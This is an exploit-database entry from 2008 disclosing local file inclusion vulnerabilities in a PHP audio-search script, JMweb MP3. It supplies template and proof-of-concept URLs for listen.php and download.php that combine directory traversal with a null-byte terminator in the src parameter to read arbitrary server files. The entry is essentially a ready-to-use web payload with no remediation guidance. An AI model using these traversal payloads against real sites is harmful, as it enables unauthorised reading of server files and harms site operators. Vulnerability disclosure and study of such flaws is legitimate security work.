JMweb Multiple (src) Local File Inclusion Vulnerabilities

2008-10-04T00:00:00
ID 1337DAY-ID-3832
Type zdt
Reporter SirGod
Modified 2008-10-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
JMweb Multiple (src) Local File Inclusion Vulnerabilities
=========================================================


#################################################################################################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
##################################################################################################

# Script Homepage:
# http://www.jesse-web.co.cc //

[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip

[+] Local File Inclusion

     Example  1 :

       http://[target]/[path]/listen.php?src=[Local File]%00

     PoC 1 :

       http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00


    Example 2 :

       http://[target]/[path]/download.php?src=[Local File]%00

    PoC 2 :

      http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00

##################################################################################################



#  0day.today [2018-03-02]  #